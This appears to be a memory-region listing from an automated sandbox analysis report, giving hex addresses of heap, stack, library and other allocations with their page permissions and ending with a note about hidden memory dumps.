page read and write
5EB000
heap
page read and write
2548000
trusted library allocation
page read and write
1F0000
heap
page read and write
195000
heap
page read and write
140000
heap
page read and write
1C0EC000
stack
page read and write
2900000
heap
page read and write
7FE89AA0000
trusted library allocation
page read and write
14F000
heap
page read and write
427000
heap
page read and write
2B4F000
stack
page read and write
3790000
heap
page read and write
306000
heap
page read and write
F70000
heap
page read and write
3133000
heap
page read and write
7FE899B4000
trusted library allocation
page read and write
4C0000
heap
page read and write
396000
heap
page read and write
7D0000
heap
page read and write
295C000
trusted library allocation
page read and write
53F000
heap
page read and write
3E9A000
stack
page read and write
4DB2000
heap
page read and write
13B000
heap
page read and write
4175000
heap
page read and write
1AB000
heap
page read and write
26D000
heap
page read and write
D2F000
stack
page read and write
7A3000
heap
page read and write
1D10000
trusted library allocation
page read and write
1FB0000
direct allocation
page read and write
4465000
heap
page read and write
5D9000
heap
page read and write
28EF000
stack
page read and write
7FE89C30000
trusted library allocation
page read and write
4490000
heap
page read and write
1A878000
heap
page read and write
1DB0000
heap
page read and write
48E000
heap
page read and write
56C000
heap
page read and write
2CF000
heap
page read and write
414F000
heap
page read and write
370E000
trusted library allocation
page read and write
44B2000
heap
page read and write
3B0000
heap
page read and write
4B0000
direct allocation
page read and write
3841000
heap
page read and write
7FE899E0000
trusted library allocation
page execute and read and write
335D000
stack
page read and write
44AB000
heap
page read and write
1FE3000
direct allocation
page read and write
2023000
direct allocation
page read and write
12010000
trusted library allocation
page read and write
191000
heap
page read and write
3929000
trusted library allocation
page read and write
2EE000
heap
page read and write
7FE899C0000
trusted library allocation
page execute and read and write
30C5000
trusted library allocation
page read and write
1CE000
heap
page read and write
1B0000
trusted library allocation
page read and write
2023000
direct allocation
page read and write
44A8000
heap
page read and write
1A000000
heap
page read and write
1C85E000
stack
page read and write
48F000
heap
page read and write
10000
heap
page read and write
4AB000
direct allocation
page read and write
4891000
heap
page read and write
1B38B000
stack
page read and write
56D000
heap
page read and write
44AD000
heap
page read and write
7FE89B30000
trusted library allocation
page read and write
3520000
trusted library allocation
page read and write
1A27D000
stack
page read and write
2A99000
trusted library allocation
page read and write
492000
heap
page read and write
46D000
heap
page read and write
F9F000
stack
page read and write
7FE898CD000
trusted library allocation
page execute and read and write
446B000
heap
page read and write
4D51000
heap
page read and write
1DF000
heap
page read and write
4F30000
trusted library allocation
page read and write
2A95000
trusted library allocation
page read and write
36EE000
trusted library allocation
page read and write
27CE000
trusted library allocation
page read and write
195000
heap
page read and write
36EE000
trusted library allocation
page read and write
7FE89AC4000
trusted library allocation
page read and write
4FCF000
heap
page read and write
4F85000
heap
page read and write
2067000
trusted library allocation
page read and write
230F000
stack
page read and write
40A000
heap
page read and write
2211000
trusted library allocation
page read and write
447000
heap
page read and write
3D0000
heap
page read and write
7FE899B2000
trusted library allocation
page read and write
2A91000
trusted library allocation
page read and write
3935000
trusted library allocation
page read and write
3EDD000
heap
page read and write
243000
heap
page read and write
41DF000
heap
page read and write
34D0000
trusted library allocation
page read and write
4FAB000
heap
page read and write
7FE89AC0000
trusted library allocation
page read and write
3930000
trusted library allocation
page read and write
7FE89A60000
trusted library allocation
page read and write
39B5000
trusted library allocation
page read and write
7FE89A80000
trusted library allocation
page read and write
7FE89A20000
trusted library allocation
page read and write
5DD000
heap
page read and write
41CF000
heap
page read and write
7FE89A10000
trusted library allocation
page read and write
38AF000
stack
page read and write
41D3000
heap
page read and write
44AB000
heap
page read and write
35F000
stack
page read and write
1A815000
heap
page read and write
7FE89B16000
trusted library allocation
page read and write
41DE000
heap
page read and write
7FE89A40000
trusted library allocation
page read and write
7AD000
heap
page read and write
3EDB000
heap
page read and write
5F0000
heap
page read and write
406C000
heap
page read and write
10000000
direct allocation
page read and write
43D000
heap
page read and write
1A5FD000
stack
page read and write
4049000
heap
page read and write
7FE89970000
trusted library allocation
page read and write
49F0000
trusted library allocation
page read and write
7FE89BA0000
trusted library allocation
page read and write
2EAE000
stack
page read and write
445C000
heap
page read and write
3F1D000
heap
page read and write
3842000
heap
page read and write
3929000
trusted library allocation
page read and write
4FAC000
heap
page read and write
406C000
heap
page read and write
405E000
stack
page read and write
2EBB000
trusted library allocation
page read and write
4187000
heap
page read and write
54B0000
heap
page read and write
7FE898D3000
trusted library allocation
page read and write
1AA93000
heap
page read and write
1A91F000
stack
page read and write
44A4000
heap
page read and write
1AB000
heap
page read and write
2C72000
heap
page read and write
110000
trusted library section
page read and write
45C000
system
page execute and read and write
2F20000
heap
page read and write
27C000
heap
page read and write
215000
stack
page read and write
456000
system
page execute and read and write
1EBD000
stack
page read and write
40DF000
stack
page read and write
3ECC000
heap
page read and write
2FA000
heap
page read and write
36EE000
trusted library allocation
page read and write
4AF000
direct allocation
page read and write
1DE0000
direct allocation
page read and write
10F3000
heap
page read and write
41D8000
heap
page read and write
3929000
trusted library allocation
page read and write
2D12000
trusted library allocation
page read and write
4046000
heap
page read and write
2017000
direct allocation
page read and write
2365000
trusted library allocation
page read and write
500000
heap
page read and write
5A2000
heap
page read and write
1AF69000
stack
page read and write
4487000
heap
page read and write
7FE89AB0000
trusted library allocation
page read and write
4FBD000
heap
page read and write
3935000
trusted library allocation
page read and write
7FE89BC0000
trusted library allocation
page read and write
1AAFE000
stack
page read and write
1C4CF000
stack
page read and write
370E000
trusted library allocation
page read and write
4293000
heap
page read and write
1B026000
heap
page read and write
1C86000
heap
page read and write
B8000
heap
page read and write
4FCB000
heap
page read and write
352000
heap
page read and write
B0000
heap
page read and write
4292000
heap
page read and write
2D11000
trusted library allocation
page read and write
4FCC000
heap
page read and write
2EBB000
trusted library allocation
page read and write
8130000
trusted library allocation
page read and write
1C26A000
heap
page read and write
370E000
trusted library allocation
page read and write
1EF000
trusted library allocation
page read and write
346000
stack
page read and write
416F000
heap
page read and write
4FA9000
heap
page read and write
400000
system
page execute and read and write
4100000
heap
page read and write
3B0000
heap
page execute and read and write
10001000
direct allocation
page execute and read and write
24A1000
trusted library allocation
page read and write
33EF000
stack
page read and write
3EA000
heap
page read and write
488000
heap
page read and write
2DA000
heap
page read and write
3CD000
heap
page read and write
7FE89B30000
trusted library allocation
page read and write
4F6D000
heap
page read and write
3F7E000
heap
page read and write
1FE3000
direct allocation
page read and write
2A9F000
trusted library allocation
page read and write
7FE899D0000
trusted library allocation
page execute and read and write
290000
heap
page read and write
48A000
heap
page read and write
17B000
heap
page read and write
1A710000
heap
page read and write
5DE000
heap
page read and write
1100000
trusted library allocation
page read and write
4C4000
heap
page read and write
3AF000
heap
page read and write
370E000
trusted library allocation
page read and write
191000
heap
page read and write
1C290000
heap
page read and write
44E000
heap
page read and write
1E9F000
stack
page read and write
10000
heap
page read and write
7FE89976000
trusted library allocation
page read and write
241000
heap
page read and write
377000
heap
page read and write
1AA40000
heap
page read and write
5A7000
heap
page read and write
206000
heap
page read and write
3E9C000
heap
page read and write
43F000
heap
page read and write
12041000
trusted library allocation
page read and write
277000
heap
page read and write
492000
heap
page read and write
4F89000
heap
page read and write
28F1000
trusted library allocation
page read and write
1AC6E000
stack
page read and write
2BCF000
stack
page read and write
196000
heap
page read and write
1B1DE000
stack
page read and write
1A0000
heap
page read and write
28DB000
heap
page read and write
4FCB000
heap
page read and write
4A0000
heap
page read and write
4464000
heap
page read and write
7FE89B10000
trusted library allocation
page read and write
2EBB000
trusted library allocation
page read and write
30D0000
trusted library allocation
page execute
1D86000
heap
page read and write
6330000
trusted library allocation
page read and write
4FB1000
heap
page read and write
3E8000
heap
page read and write
36EE000
trusted library allocation
page read and write
254D000
trusted library allocation
page read and write
3F7D000
heap
page read and write
2EBB000
trusted library allocation
page read and write
7FE89B70000
trusted library allocation
page read and write
7FE89A90000
trusted library allocation
page read and write
1219000
trusted library allocation
page read and write
4059000
heap
page read and write
303000
heap
page read and write
3EDD000
heap
page read and write
2C0C000
heap
page read and write
40E000
heap
page read and write
30A1000
trusted library allocation
page read and write
445000
heap
page read and write
7F0000
heap
page read and write
D0000
heap
page read and write
44A1000
heap
page read and write
1C12E000
stack
page read and write
446000
heap
page read and write
5350000
trusted library allocation
page read and write
2AA2000
trusted library allocation
page read and write
34EB000
stack
page read and write
195000
heap
page read and write
7FE89AD0000
trusted library allocation
page read and write
1C20E000
stack
page read and write
3558000
trusted library allocation
page read and write
3950000
heap
page read and write
4166000
heap
page read and write
538000
heap
page read and write
2D13000
trusted library allocation
page read and write
4FCB000
heap
page read and write
48F8000
heap
page read and write
1ABA8000
heap
page read and write
106000
heap
page read and write
7FE897E3000
trusted library allocation
page read and write
23AF000
stack
page read and write
2D1A000
trusted library allocation
page read and write
4DB2000
heap
page read and write
5F5000
heap
page read and write
1A4DE000
stack
page read and write
7FE898C4000
trusted library allocation
page read and write
2C8A000
heap
page read and write
30A3000
trusted library allocation
page read and write
524000
heap
page read and write
28A0000
heap
page read and write
4151000
heap
page read and write
4055000
heap
page read and write
5AE000
heap
page read and write
28F000
trusted library allocation
page read and write
7FE89A90000
trusted library allocation
page read and write
20DB000
heap
page read and write
1AC45000
stack
page read and write
1A1E0000
heap
page read and write
4491000
heap
page read and write
744000
heap
page read and write
4A46000
heap
page read and write
49B000
direct allocation
page read and write
444000
heap
page read and write
1DE0000
trusted library allocation
page read and write
295E000
trusted library allocation
page read and write
7FE897D3000
trusted library allocation
page execute and read and write
49F0000
trusted library allocation
page read and write
24EF000
stack
page read and write
4067000
heap
page read and write
35A0000
heap
page read and write
370E000
trusted library allocation
page read and write
2EBB000
trusted library allocation
page read and write
38A000
heap
page read and write
195000
heap
page read and write
1B14B000
heap
page read and write
195000
heap
page read and write
4900000
heap
page read and write
4464000
heap
page read and write
1D0000
trusted library allocation
page read and write
403000
heap
page read and write
197000
heap
page read and write
3740000
heap
page read and write
1AB83000
heap
page read and write
1A51E000
heap
page execute and read and write
2C3F000
heap
page read and write
29E5000
trusted library allocation
page read and write
494C000
heap
page read and write
1D0000
heap
page read and write
3600000
heap
page read and write
3842000
heap
page read and write
2A93000
trusted library allocation
page read and write
38B000
heap
page read and write
13B000
heap
page read and write
4A44000
heap
page read and write
1E70000
direct allocation
page read and write
1A999000
stack
page read and write
2D3D000
stack
page read and write
1B2CC000
stack
page read and write
56E000
heap
page read and write
20000
heap
page read and write
416B000
heap
page read and write
492000
heap
page read and write
399E000
trusted library allocation
page read and write
814000
heap
page read and write
2D0E000
trusted library allocation
page read and write
1DB0000
trusted library allocation
page read and write
2730000
trusted library allocation
page read and write
7FE899A0000
trusted library allocation
page execute and read and write
2EF0000
heap
page read and write
314000
heap
page read and write
4167000
heap
page read and write
1A7AB000
heap
page read and write
2C3E000
heap
page read and write
20000
heap
page read and write
2C0B000
stack
page read and write
44A8000
heap
page read and write
4CE000
heap
page read and write
4464000
heap
page read and write
4A85000
heap
page read and write
453000
heap
page read and write
370E000
trusted library allocation
page read and write
448A000
heap
page read and write
282A000
trusted library allocation
page read and write
180000
heap
page read and write
4050000
heap
page read and write
46E000
heap
page read and write
10000
heap
page read and write
37F4000
heap
page read and write
10016000
direct allocation
page execute and read and write
7FE89B80000
trusted library allocation
page read and write
609000
heap
page read and write
30C8000
trusted library allocation
page read and write
2EBB000
trusted library allocation
page read and write
48E000
heap
page read and write
1B1F0000
heap
page read and write
3800000
heap
page read and write
4250000
heap
page read and write
3A8000
heap
page read and write
1F50000
direct allocation
page read and write
199000
heap
page read and write
1AD0F000
stack
page read and write
5930000
trusted library allocation
page read and write
3EA000
heap
page read and write
20F000
heap
page read and write
7FE89820000
trusted library allocation
page read and write
3A5F000
stack
page read and write
113F000
stack
page read and write
7FE89AC0000
trusted library allocation
page read and write
7E7000
heap
page read and write
1200000
trusted library allocation
page read and write
307E000
stack
page read and write
366000
heap
page read and write
1070000
heap
page read and write
492000
heap
page read and write
1A44E000
stack
page read and write
439000
heap
page read and write
4D50000
heap
page read and write
1C315000
heap
page read and write
1AA78000
stack
page read and write
2CA6000
heap
page read and write
1C210000
heap
page read and write
1A720000
heap
page execute and read and write
4A0000
direct allocation
page read and write
480000
heap
page read and write
4292000
heap
page read and write
4163000
heap
page read and write
36EE000
trusted library allocation
page read and write
4A09000
heap
page read and write
59D000
heap
page read and write
374000
heap
page read and write
3935000
trusted library allocation
page read and write
7FE89B40000
trusted library allocation
page read and write
2D1A000
trusted library allocation
page read and write
48F000
heap
page read and write
4466000
heap
page read and write
624000
heap
page read and write
30D5000
trusted library allocation
page read and write
589000
heap
page read and write
131000
heap
page read and write
448A000
heap
page read and write
A8E000
stack
page read and write
10A9000
heap
page read and write
7FE89AF0000
trusted library allocation
page read and write
7FE89A20000
trusted library allocation
page read and write
3935000
trusted library allocation
page read and write
4498000
heap
page read and write
2010000
direct allocation
page read and write
2D0A000
trusted library allocation
page read and write
1B110000
heap
page read and write
124A1000
trusted library allocation
page read and write
10000
heap
page read and write
1D94000
heap
page read and write
1A728000
heap
page execute and read and write
4FBB000
heap
page read and write
7FE89970000
trusted library allocation
page read and write
4C4000
heap
page read and write
1A75E000
heap
page execute and read and write
3FC1000
heap
page read and write
7FE898F0000
trusted library allocation
page execute and read and write
416E000
heap
page read and write
40E000
heap
page read and write
8B30000
trusted library allocation
page read and write
3EDB000
heap
page read and write
32C000
heap
page read and write
170000
heap
page read and write
1A9000
heap
page read and write
3EDB000
heap
page read and write
4455000
heap
page read and write
4F0000
heap
page read and write
3E70000
heap
page read and write
2C1F000
heap
page read and write
4905000
heap
page read and write
7FE89BB0000
trusted library allocation
page read and write
2FF000
heap
page read and write
1C13B000
heap
page read and write
10000
heap
page read and write
439000
heap
page read and write
384D000
heap
page read and write
12001000
trusted library allocation
page read and write
36EE000
trusted library allocation
page read and write
44AB000
heap
page read and write
7FE89A70000
trusted library allocation
page read and write
370E000
trusted library allocation
page read and write
7FE89A60000
trusted library allocation
page read and write
4FCB000
heap
page read and write
10000
heap
page read and write
377000
heap
page read and write
2670000
trusted library allocation
page execute read
C3C000
stack
page read and write
493000
direct allocation
page read and write
3EDD000
heap
page read and write
2EBB000
trusted library allocation
page read and write
1A7A0000
heap
page read and write
44AF000
heap
page read and write
44A4000
heap
page read and write
38A000
heap
page read and write
8C000
stack
page read and write
7FE89BF0000
trusted library allocation
page read and write
30AD000
trusted library allocation
page read and write
4899000
heap
page read and write
410000
heap
page read and write
1213000
trusted library allocation
page read and write
2311000
trusted library allocation
page read and write
26C0000
heap
page read and write
488000
heap
page read and write
D0000
heap
page read and write
492000
heap
page read and write
529000
heap
page read and write
30C000
heap
page read and write
7FE89B30000
trusted library allocation
page read and write
44A5000
heap
page read and write
3F80000
heap
page read and write
570000
heap
page read and write
41CF000
heap
page read and write
D4000
heap
page read and write
449B000
heap
page read and write
2AA2000
trusted library allocation
page read and write
44B2000
heap
page read and write
489000
heap
page read and write
44A5000
heap
page read and write
2538000
trusted library allocation
page read and write
249F000
stack
page read and write
1D0000
heap
page read and write
2C40000
heap
page read and write
1A78F000
stack
page read and write
3801000
heap
page read and write
1ADCE000
stack
page read and write | page guard
7FE89A73000
trusted library allocation
page read and write
3ED000
heap
page read and write
557000
heap
page read and write
370E000
trusted library allocation
page read and write
4CB000
heap
page read and write
2D17000
trusted library allocation
page read and write
2C3A000
heap
page read and write
4466000
heap
page read and write
2D10000
trusted library allocation
page read and write
20000
heap
page read and write
7FE897DD000
trusted library allocation
page execute and read and write
445C000
heap
page read and write
4FC5000
heap
page read and write
36EE000
trusted library allocation
page read and write
370E000
trusted library allocation
page read and write
7FC000
heap
page read and write
2C3C000
heap
page read and write
492000
heap
page read and write
36EE000
trusted library allocation
page read and write
7C4000
heap
page read and write
7D7000
heap
page read and write
399000
heap
page read and write
370E000
trusted library allocation
page read and write
4FB1000
heap
page read and write
4DB3000
heap
page read and write
49E000
heap
page read and write
4D3000
heap
page read and write
1A6AF000
stack
page read and write
4DB2000
heap
page read and write
484000
heap
page read and write
414000
heap
page read and write
1F26000
heap
page read and write
1C2A2000
heap
page read and write
2510000
trusted library allocation
page read and write
228000
heap
page read and write
7FE89A10000
trusted library allocation
page read and write
7FE899C3000
trusted library allocation
page read and write
4F50000
heap
page read and write
1C0BB000
heap
page read and write
4C0000
trusted library allocation
page read and write
3ED4000
heap
page read and write
1B24F000
stack
page read and write
7FE898D0000
trusted library allocation
page read and write
550000
heap
page read and write
5A7000
heap
page read and write
3A8000
heap
page read and write
7FE89A00000
trusted library allocation
page execute and read and write
3EDB000
heap
page read and write
44AB000
heap
page read and write
575000
heap
page read and write
42E000
heap
page read and write
28DF000
stack
page read and write
8AB000
heap
page read and write
370E000
trusted library allocation
page read and write
84E000
heap
page read and write
5A5000
heap
page read and write
44AD000
heap
page read and write
124D1000
trusted library allocation
page read and write
5F0000
heap
page read and write
36EE000
trusted library allocation
page read and write
3320000
trusted library allocation
page execute
7FE897E0000
trusted library allocation
page read and write
261A000
stack
page read and write
7FE898C2000
trusted library allocation
page read and write
440000
direct allocation
page read and write
1A7F1000
heap
page read and write
26EA000
trusted library allocation
page read and write
416A000
heap
page read and write
7FE89AB0000
trusted library allocation
page read and write
1F7A000
stack
page read and write
2A9B000
trusted library allocation
page read and write
4176000
heap
page read and write
1F30000
direct allocation
page read and write
36EE000
trusted library allocation
page read and write
3B00000
trusted library allocation
page read and write
1C0000
heap
page read and write
40B000
heap
page read and write
2D16000
trusted library allocation
page read and write
49C000
heap
page read and write
124A7000
trusted library allocation
page read and write
3D0000
heap
page read and write
1AB98000
stack
page read and write
4173000
heap
page read and write
7FE89890000
trusted library allocation
page execute and read and write
3935000
trusted library allocation
page read and write
124000
heap
page read and write
200000
heap
page read and write
1C5FA000
stack
page read and write
370E000
trusted library allocation
page read and write
7FE89A30000
trusted library allocation
page read and write
41DB000
heap
page read and write
5F4000
heap
page read and write
48A000
heap
page read and write
12021000
trusted library allocation
page read and write
44A1000
heap
page read and write
370E000
trusted library allocation
page read and write
4F51000
heap
page read and write
5B9000
heap
page read and write
7FE89AC0000
trusted library allocation
page read and write
3380000
trusted library allocation
page read and write
7FE89A60000
trusted library allocation
page read and write
4469000
heap
page read and write
370000
heap
page read and write
2A9B000
trusted library allocation
page read and write
48F000
heap
page read and write
3F4C000
heap
page read and write
1C06C000
stack
page read and write
275A000
trusted library allocation
page read and write
191000
heap
page read and write
3EF000
heap
page read and write
616000
heap
page read and write
7FE899C7000
trusted library allocation
page read and write
36EE000
trusted library allocation
page read and write
7FE89813000
trusted library allocation
page execute and read and write
4FC5000
heap
page read and write
4F85000
heap
page read and write
6D30000
trusted library allocation
page read and write
2EBB000
trusted library allocation
page read and write
30B2000
trusted library allocation
page read and write
48E000
heap
page read and write
2EA0000
trusted library allocation
page read and write
360000
trusted library allocation
page read and write
7FE89B20000
trusted library allocation
page read and write
2512000
trusted library allocation
page read and write
7FE89AD0000
trusted library allocation
page read and write
30A5000
trusted library allocation
page read and write
24E5000
trusted library allocation
page read and write
1FE000
stack
page read and write
1B19F000
stack
page read and write
397E000
trusted library allocation
page read and write
43C000
heap
page read and write
2A9D000
trusted library allocation
page read and write
44A6000
heap
page read and write
7FE89B00000
trusted library allocation
page read and write
20D000
heap
page read and write
477000
heap
page read and write
2508000
trusted library allocation
page read and write
4292000
heap
page read and write
1ABB7000
heap
page read and write
1D90000
heap
page read and write
3EDD000
heap
page read and write
1CB0000
heap
page read and write
3940000
trusted library allocation
page read and write
3D0000
trusted library allocation
page read and write
44A6000
heap
page read and write
41CA000
heap
page read and write
12181000
trusted library allocation
page read and write
4C9000
heap
page read and write
449C000
heap
page read and write
266C000
trusted library allocation
page read and write
1A89D000
heap
page read and write
44AD000
heap
page read and write
370E000
trusted library allocation
page read and write
2C5B000
heap
page read and write
5350000
trusted library allocation
page read and write
10000
heap
page read and write
1AB50000
heap
page read and write
24C000
stack
page read and write
450000
direct allocation
page read and write
19A000
heap
page read and write
1C2D0000
heap
page read and write
339000
heap
page read and write
7FE89B10000
trusted library allocation
page read and write
4A3C000
heap
page read and write
36EE000
trusted library allocation
page read and write
448A000
heap
page read and write
492000
heap
page read and write
3F1D000
heap
page read and write
308000
heap
page read and write
4F69000
heap
page read and write
3930000
trusted library allocation
page read and write
445000
heap
page read and write
3935000
trusted library allocation
page read and write
330000
heap
page read and write
2C53000
heap
page read and write
490000
direct allocation
page read and write
48E000
heap
page read and write
3930000
trusted library allocation
page read and write
44A4000
heap
page read and write
3ECC000
heap
page read and write
4FCB000
heap
page read and write
1D50000
heap
page read and write
3358000
trusted library allocation
page read and write
449D000
heap
page read and write
7FE897D2000
trusted library allocation
page read and write
2AA2000
trusted library allocation
page read and write
3ED4000
heap
page read and write
36EE000
trusted library allocation
page read and write
5CE000
heap
page read and write
41CF000
heap
page read and write
41B000
system
page execute and read and write
3FAF000
stack
page read and write
496000
heap
page read and write
150000
heap
page read and write
7FE899B2000
trusted library allocation
page read and write
44AB000
heap
page read and write
3040000
remote allocation
page read and write
7FE898C0000
trusted library allocation
page read and write
CDF000
stack
page read and write
1D9000
heap
page read and write
2AA3000
trusted library allocation
page read and write
2CA6000
heap
page read and write
3BC0000
heap
page read and write
1E0000
trusted library allocation
page read and write
489000
heap
page read and write
3FCB000
heap
page read and write
7FE89987000
trusted library allocation
page read and write
3040000
remote allocation
page read and write
1CF0000
heap
page read and write
276000
heap
page read and write
2C21000
heap
page read and write
44B2000
heap
page read and write
419000
heap
page read and write
5B4000
heap
page read and write
44B2000
heap
page read and write
120000
heap
page read and write
220000
heap
page read and write
573000
heap
page read and write
1A813000
heap
page read and write
3929000
trusted library allocation
page read and write
406000
heap
page read and write
3F8000
stack
page read and write
622000
heap
page read and write
3929000
trusted library allocation
page read and write
36EE000
trusted library allocation
page read and write
44AD000
heap
page read and write
4F7000
heap
page read and write
4D1000
heap
page read and write
10000
heap
page read and write
370E000
trusted library allocation
page read and write
492000
heap
page read and write
4DB2000
heap
page read and write
26E0000
trusted library allocation
page read and write
1AA66000
heap
page read and write
7FE89A18000
trusted library allocation
page read and write
28C8000
trusted library allocation
page read and write
7FE89B40000
trusted library allocation
page read and write
1C2CE000
stack
page read and write
3930000
trusted library allocation
page read and write
1FD0000
direct allocation
page read and write
318000
heap
page read and write
370E000
trusted library allocation
page read and write
2A97000
trusted library allocation
page read and write
26EF000
trusted library allocation
page read and write
3080000
trusted library allocation
page read and write
4FAE000
heap
page read and write
3740000
trusted library allocation
page read and write
7FE89886000
trusted library allocation
page read and write
1AB4F000
stack
page read and write
20000
heap
page read and write
48A000
heap
page read and write
2D08000
trusted library allocation
page read and write
103E000
stack
page read and write
1C7000
heap
page read and write
1ABE7000
heap
page read and write
4492000
heap
page read and write
41BF000
stack
page read and write
19A000
heap
page read and write
32C000
heap
page read and write
1A0000
heap
page read and write
3AF000
heap
page read and write
45D000
system
page execute and read and write
2C38000
heap
page read and write
123F000
stack
page read and write
37F0000
heap
page read and write
3152000
heap
page read and write
4A00000
heap
page read and write
2958000
trusted library allocation
page read and write
4640000
heap
page read and write
4FA7000
heap
page read and write
7FE898DB000
trusted library allocation
page read and write
4495000
heap
page read and write
21C000
stack
page read and write
1DC0000
direct allocation
page read and write
439000
heap
page read and write
2D05000
trusted library allocation
page read and write
3ED4000
heap
page read and write
2EBB000
trusted library allocation
page read and write
42D000
heap
page read and write
40E4000
heap
page read and write
4FB0000
heap
page read and write
480000
heap
page read and write
492000
heap
page read and write
1C2AE000
heap
page read and write
7FE89C10000
trusted library allocation
page read and write
225000
heap
page read and write
42C000
heap
page read and write
4021000
heap
page read and write
17C000
heap
page read and write
4468000
heap
page read and write
2D1A000
trusted library allocation
page read and write
1EB0000
heap
page read and write
36EE000
trusted library allocation
page read and write
4FAA000
heap
page read and write
400000
system
page execute and read and write
4292000
heap
page read and write
173000
heap
page read and write
37A0000
trusted library allocation
page read and write
7BE000
stack
page read and write
2AA2000
trusted library allocation
page read and write
7FE89AF0000
trusted library allocation
page read and write
44D000
heap
page read and write
370E000
trusted library allocation
page read and write
171000
heap
page read and write
479000
heap
page read and write
2D1D000
trusted library allocation
page read and write
61B000
heap
page read and write
7FE89B10000
trusted library allocation
page read and write
7FE899D0000
trusted library allocation
page read and write
41DE000
heap
page read and write
446F000
stack
page read and write
1A9000
heap
page read and write
32D0000
trusted library allocation
page read and write
1A698000
stack
page read and write
2EBB000
trusted library allocation
page read and write
32A0000
trusted library allocation
page read and write
5BE000
stack
page read and write
250000
heap
page read and write
2D1D000
trusted library allocation
page read and write
4A8E000
heap
page read and write
52C000
heap
page read and write
3FC2000
heap
page read and write
496000
heap
page read and write
44A6000
heap
page read and write
4FCE000
heap
page read and write
41DC000
heap
page read and write
7E0000
heap
page read and write
879000
heap
page read and write
7FE89823000
trusted library allocation
page read and write
170000
heap
page read and write
2C3D000
heap
page read and write
315000
stack
page read and write
42F000
heap
page read and write
37C000
heap
page read and write
374000
heap
page read and write
474000
remote allocation
page execute and read and write
44AD000
heap
page read and write
25B000
heap
page read and write
490000
trusted library allocation
page read and write
4C0000
heap
page read and write
4905000
heap
page read and write
3EBC000
heap
page read and write
4A8E000
heap
page read and write
589000
heap
page read and write
2201000
trusted library allocation
page read and write
256000
heap
page read and write
504000
heap
page read and write
7FE89A7C000
trusted library allocation
page read and write
41CF000
heap
page read and write
2E2C000
stack
page read and write
1AB000
heap
page read and write
1AFF0000
heap
page read and write
149000
heap
page read and write
7FE8982B000
trusted library allocation
page read and write
10000
heap
page read and write
2B0000
heap
page read and write
2A95000
trusted library allocation
page read and write
20000
heap
page read and write
47B000
heap
page read and write
7FE898D0000
trusted library allocation
page execute and read and write
3837000
heap
page read and write
7FE89AD0000
trusted library allocation
page read and write
CCE000
stack
page read and write
364000
stack
page read and write
4293000
heap
page read and write
There are 1582 hidden memdumps, click here to show them.